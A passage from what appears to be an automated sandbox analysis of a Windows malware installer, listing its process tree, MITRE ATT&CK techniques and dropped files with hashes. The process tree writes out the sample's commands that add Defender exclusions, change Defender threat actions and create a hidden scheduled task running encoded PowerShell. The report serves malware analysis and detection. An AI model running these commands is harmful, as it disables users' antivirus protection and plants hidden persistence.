    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5856
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "grnnzcdCd" /SC once /ST 00:01:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "grnnzcdCd"
  2⤵
  PID:5968

C:\Users\Admin\AppData\Local\Temp\7zS15A6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS15A6.tmp\Install.exe it /itSdidcQqg 385118 /S
1⤵
PID:4264
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5536
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5988
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5564
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4700
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4680
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5472
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:3228
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:1876
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4684
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5968
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5124
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5844
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1240
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5732
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3456
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5812

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:4988
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5648

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
b3a60dd5a45c07075816112602a48e29

SHA1
6856a3b387bae40389696e75388817495b895f42

SHA256
229a65e9af605a997647b96a587ffec2f6ed7eb4698e180c570ac01b64a881ad

SHA512
7236c0d8005aac13eb422f6539f7c953d9ca0ff042b4d03f621e96c470835650b81abbd8d3adaf576da35aaadfbe9201a102549e4c72df48b248be169babbd4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
9ff5e819a0df34762fc924969d1195e2

SHA1
adc5d859b600ad2a8f5ef5f603c27fbe3ca87fec

SHA256
b5f27b6645e81b48dd9b56790de264a4c7b79d0099a49ccef71cfaefc953dfff

SHA512
09473953f755902bddc9a299bfcc60171f824a105c0a9cb2b529856846b075a2fb765c1a3646bb06f7f24a0035ca48e9e7478ee0c9d0d3a5b71920b99df8419b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
2af8f78b6ea23855e3fdfc0a25a72f1c

SHA1
2e59c7aff82015cacbe6828cbd8c21a0ac45e586

SHA256
25aeafa25573c57173d6dbc196dc573d3b29cc88ac14490a466d4753a347ab06

SHA512
71fc033f096323e8c48fee804d8e586b6e1cac124fd5570b4e3ca20cc853deb905b12cae85b46969d68b0619edef43ba94cffa6b64a33bb492612b0d6e526c3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5f9dd961bf8bd50c4987de893d27be39

SHA1
fc27a9cf328ce0b4229f48b9c59232ab4f3a4184

SHA256
98647a2959eb45a50b5796b02a2a5a0f048f489ea09e700bcb85aad1e6c95a3a

SHA512
e8ef26bb294aecafb995cfdf0984530b1b9fb8bfbefae0584f9205b24a0a8f42388776598905d075a331f5e81ff29b8f16829f0af31c1c8fa540455418dc2819

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
a407f2d3ceda0c72e0cce7ed6f236e31

SHA1
d445c0fc716c3b5ba5356c208f17608d338d52b5

SHA256
1850255b341c68549cb0dcac460033a4ae98832376f02864b403f91335144f84

SHA512
0e14922932ae1435a9399d48e7ac519e32483985489e08d29172fef50bc88ef510d23da831e4a67ef68a316d2423dd469d0105ba01a956f0ae01b0982ab7cafe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
cea31b9299a008e6671da346a88b1cf6

SHA1
be5e09ea0a4067af97ff1d8c8e3aac0a8f84e566

SHA256
867c4e6bf4f591256dc03459dcd143b32bbb31b9edde8ffda349048b28182831

SHA512
b3e68cc9bb821731992c5081626276052db0a48b46e60c463ddea1dab56599306aad34891482372603de0a6a87a7ad156d712504dc9fb146bf5d88a84b80892b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
aa5ce5cefce697dc7667b82245cdc119

SHA1
dc349558ca043384d93733e839da8c9743c9efec

SHA256
24b19c1e5fd3dd7de9470a2e96a4ad5a8207a70959145d5b3d3c156b3a5ba833

SHA512
e41371b2c353677e8bc2b642dd8940c0ad96da8fa6b42b066b3015e7f5b9a8d51bcd9da23e2eda6caadfb569fc5a7f8b26995d2829a699154ec1135527b44fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS328.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hebtmel3.af3.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
f237dba1152b4556d8d995e3c8e4c681

SHA1
24e2f2d7f4bcad522dabb7b70bc377555e46093a

SHA256
7faf85d280f1316d8a50da01723131cc4490f7186ba18b5816ccec3e1df6e931

SHA512
7387a1cc0210ddd8366af37018d3e96dbde35092fa996ccccca12ee82b7948f7658bb2e67d61a805a95612c43cb246ac756213df86785fe5fb5afb938eed3ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
551baa7d0711a6f7d1d46995239efa58

SHA1
2dc74445dba5c97b77301af539e8c13dfe75ecde

SHA256
d6a92112b48ca9ad6b5c63fab78f4ad470a81b4f150ee86a68ae5be409567cd4

SHA512
7c07b0939a1d9435ec7adef1df2b5cb60a2285588e3b8c7b198ebd0a32123d47a2438323a96adb65c9548fa46b15d36d32f84d50361168676640b5ce7b059385

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1cs.0.exe

Filesize
275KB

MD5
31c1bdc2c9075e8c2eab9353c41c117f

SHA1
ab28fb009dc8c2fa244c773760109e38711b1025

SHA256
4e08b9b37494a1917d2ab809fff59b3a45673a80d25587e51c8749331bb56233

SHA512
78b995611e33b441e9ebaeecbbce3ec96bbfcac7f71bd0f639ab1e3394900be5c80893dfc8957b696609eca7ce1933d58f026c7be389795f0dcc72ad3fc35593

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1cs.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\Pictures\AIkKgSqnXFNys1TVNCAX8jCk.exe

Filesize
416KB

MD5
8cef32e368c0adcc2916dc3a57285802

SHA1
087e2fc9f317fe88090293c02f2595ae86e2a7a3

SHA256
2850cc08e81d0c629a1510a67f465316beeca0c86bfeeed55fc3dd333eb6fbe9

SHA512
8fae53d3a83346e1cd8152432f0caf2b00f44e4a57cf8d21c00a1637bf5334a6dc1877869d699930714e1bfd0b7d23af6ea19a47caa116fc790ece5d29ff3b5c

Download Submit
C:\Users\Admin\Pictures\LVmZXT5zDsu7xf1VLkiiV3Np.exe

Filesize
5.5MB

MD5
5a602d800c716ecf19aece10002da470

SHA1
3f64e4b4bc5ec25730c3ed2005885438eb8666f3

SHA256
18102f6d9c390e66827e5fae3036efd613558093291e80dfe329238f8cfa4f8d

SHA512
1c453560f70fb2b6daca26350d88a432bac91cdbee92d3c97fe9b14342eca8d82a2c00cf55897ebe3bb28f7a884dba2aef0154139866b0f4a157f78a5c2d4ebb

Download Submit
C:\Users\Admin\Pictures\LbaaTACpH1mS6IjhCeRFiYRc.exe

Filesize
4.2MB

MD5
30f2eaae092b296f0af5cea4aa2d0339

SHA1
00e078197fef66a8c8cb227d94f354a748b52f7d

SHA256
70f9d8b351abad874b31287f70e525ddc15894e2c7954a4af3e01669456a942e

SHA512
3e89a1161f168ab4afbd8d212f9bdfe4e33cb36b3eec7a5392facebb55407c6c88a4de12c5d7ef80fb731dbef26cd5c820f30b396675559d85d25b88e8495e29

Download Submit
C:\Users\Admin\Pictures\cZ8ISRgNYFRrEz55eI5Jq3Xo.exe

Filesize
4.2MB

MD5
5919e29493f6d033585eb0ff67870539

SHA1
ef8c183da2954e1786b17937b481649b4ad6b7ab

SHA256
e2b6cfac6fd993250d40bcd8b6883acfe0dcec844cd6ec862714abddb034cce9

SHA512
1a6d2cef09f0739ef005a3db54499fc3f9ba49f91e05f674f7838aed40f55216bb5eec471e7964f01a9b92312c30db4097b9a15cd75365d8d0a946d692aeeb3c

Download Submit
C:\Users\Admin\Pictures\lIrVZJxdNSbg3XlpVNAc7fOl.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\Pictures\zRejBmjvGS6usRS1r1NrX0kH.exe

Filesize
6.2MB

MD5
5638d57a305af6d979c2ff2f7634605a

SHA1
d411fe7f10fe6488f4bbcc52704146d124177f9b

SHA256
bc912349a4c6e0700e5709eed23eda3f1e5375c973b17de0c77a78398ca5db16

SHA512
acea97ee145a44fecd8dd403f4045ddfb1a31d1a59dc5b700d564640c4fe1fecdf7f9efdb9fb996c52e7a5957bf09e12ba2852c9abd56ff2e8382283f648a990

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
cb53585950f2d60fc01652717990239c

SHA1
450688a660dce6670231ac60b9a500f112b00aed

SHA256
80dd72faa43260ba9d9685b0e3c95da1b48d95da1c42d63f0048ffc93599c961

SHA512
f4cd9aad061cb89eea329e08e69eba67626ab27807b90d646a75e8734fe6f0cf1a52bca7c1c585a63fa6d9d8f8737a901cf5e7a482d2eb22e0792c781ffb6ee2

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
1d2569ff0a9ecb8895443a4041b6d30e

SHA1
845351cf8afa7cd8fdca4e8a0d8a2b2ea2ebbf76

SHA256
ca8b9d6e3e6cb7edf5fa80ef516642c82a2aaf895b48052151946aa8e3ed3717

SHA512
19938cef01ef0238fb723b08129f60aba470c64d9858c80e859d2b94a060994ef7d2831ca8fe17abaf05c589f7f5e44cc88ac1d8cbde7c82d2b89ce615c2cf1f

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
5c546aa303f8cc41453fcabbeddeb758

SHA1
0318b43d12a1bd6788d7c330ba9076029612524f

SHA256
55836997c58573ab3679475d90b1cb0b283f0958d78d691150637b71dcf1461a

SHA512
8a7b9814e3be10d5601f7c3df3ce75e8c8a94fc07bfd6f3e568cb8bc8208c2aed63f86c25f04bb4a6bc879e45fac6825fdd1558b4c891e14efa138b7b0274b27

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
11a574d8a0466baf64ba8f1d3ac90377

SHA1
64c3afd6f69a080c3d514deba08842a27eda0d41

SHA256
2d109b39ccfcccb61dd6934f9889895495908dad104b14901d3c60556a0cc6c5

SHA512
0cf25f2bbae99483bce7bd0f8d986c7bd1efffba7ce4377ca951928fbc2dd52d38f9a7c55a00360b681ac4753cde84898073a8e114752fa659e138f43e839e7a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
e7f6dca320512c926bc99c2448558b15

SHA1
1a566e7a3c697c8239c099368b9538f26fb7b0c8

SHA256
d5f98617f6185f067873924237f47f9e9087808283d7c31694b181d423c6bfc0

SHA512
44a800c46532f2f4889ffefa18b2c83483db42571f40f1c78067b8a2805f48f617332b8317caf4dcd8e32d2566c49f6f4177f1b07215a53665bb2a6752ec23db

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
8f36f1089def365c287d39efd660e9ab

SHA1
9bf71dfc668cc1ca7f3a40fc7611ca1b0f6d508c

SHA256
4eb6977d8093814e791be318629c3e83ab046531c86dfd2c8fbd9525780d52d9

SHA512
7cb78b673ab19f00b4c5fab23bd3f0d61b95a6106eb07aa9ea3aace3f2be86b83495dbdba31f353ed65bede82c3632a419f35e222922b51c6f898fc1fbdbcf9a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
ef64b3b1d0754e3eae73223699fb45c7

SHA1
2a8291a2520a8ed3cf7f5e5d4c11a40fb42fd0a8

SHA256
a347604e2e45629563799a9ca41a357b9cce01197c704ce2c20cb21561a10352

SHA512
0fab2806c686db76d7f8937199280d685d19b0f85ae494a0d5dc6ba362d1c3fafb4a336dd324a230b8a1240062deaf02b7cb1779b28f4d05cfe62d42b3c86c35

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
dee06b32ef3f7dfa5c60a008b1ded439

SHA1
973a56e884d24912000b57a928f584d6a2e4dfd0

SHA256
4c844afc60a288b8e5dbee5fb79c254e4f8f264988e6465c092979e07d3605df

SHA512
cde88a82d96c0d9fca10388acb79659c2ce0db356738053ff4572e723316b64e24cfa3a17c8bb19be1cdc7349589e9b430fed42d00d5bfbb6a8e473601792290

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
337df8de30791b91fab10569451f2835

SHA1
2437f4cb4490e84044ef6ee8794a55ed8623d73c

SHA256
15ae95e7410fb42acd7c0ec7146e5c121ef06eeb1752a579a89fab7d478492f1

SHA512
9ddcee2c24ed757f6b93570b805f396a75ec059c7749e09993530dd58c2522e738eb11646552f73309e8bacaf58a4f691cf9930d67c369486468ab7f201a39bf

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
de3c6212da52993b58b6ed5365c3012b

SHA1
58b71b754caa296576de6ec00d9a3f3f4928153f

SHA256
63c6625aefcadb9b5970127370089894cbc3cfd4b7d5e1822520198f2fced064

SHA512
8e47d9215f565948c757f21fc7bd908e8041083968849485c6dd8e868795e1558c0537c1e3acf693226dd457bbc6e388554fc82cd10d69950c68058f971ea2b0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
6aede25f0980bec0cae9a7f8ce03bd1a

SHA1
3b482e993afee9bc8a115b7d12ce232ca81da9de

SHA256
db8c097919ff23e7acaab78eef705e0f4f3b9d10b02a6a81be7c762433b3949e

SHA512
bf3eb25e5d859565afc9eea86c4c058ee67b81b73e366c4132d7a32a9eebe2aefaea76a6dbdc1af3ba4d3ddd10f68a7127b25a4f0dc53de39682f0cb7e23358e

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
0d81e4a9fb169fa57676734735875ade

SHA1
8ce4caa19cc7cf593c86fdcaecc7fc297c7f1908

SHA256
7a2fcff6e9d5eddc04d8e5986114af1533978f8611ef644805d04af251e4b08c

SHA512
feb6256c8d78fcc501fc714584ac781063a542b868a6fcbc850305e4ace0979bf5ab7bc8caf89268cd64c44bd33803a4926ba4bf835077e49e83695a218069e9

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
6b9b759964f4e470ec1fac1f389b0230

SHA1
1185af3a03a226261c7bea5d7f720b6be4c3cf94

SHA256
761f326f34ba15905affbc6a2209f665ec206ba961c3614fee95e87584188e63

SHA512
246935c4810312f9f24b73907f0bc13ff70a0c018fd2759352e243b41c5325e0d6d9267ec1c0b88d84098638f3be19d7e5603474dba4f7173a81320ed8cc0a84

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job

Filesize
430B

MD5
01df57fa8fb95ecfb482865cab70ccf6

SHA1
2eac5aeec984e8acb761249b57500ed7edfb653b

SHA256
b10cebca4fc632ed971e69a174b8e22164c6090395734d1838a241cbb221e043

SHA512
7065363c68e4439ea1123496c3f81f817eee3971fafad6bd2b940be2439011b415f3173cdf3b7c81ca9d8f072aa9c32fdca0c223f16965ea688dbee1f0b1461e

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol

Filesize
1KB

MD5
cdfd60e717a44c2349b553e011958b85

SHA1
431136102a6fb52a00e416964d4c27089155f73b

SHA256
0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f

SHA512
dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini

Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
memory/220-1909-0x000000006F7C0000-0x000000006F80B000-memory.dmp

Filesize
300KB

Download
memory/220-1910-0x000000006F280000-0x000000006F5D0000-memory.dmp

Filesize
3.3MB

Download
memory/772-1292-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/772-1824-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/772-1908-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/820-1895-0x000000006F7C0000-0x000000006F80B000-memory.dmp

Filesize
300KB

Download
memory/820-1903-0x0000000009A40000-0x0000000009AE5000-memory.dmp

Filesize
660KB

Download
memory/820-1898-0x000000006F280000-0x000000006F5D0000-memory.dmp

Filesize
3.3MB

Download
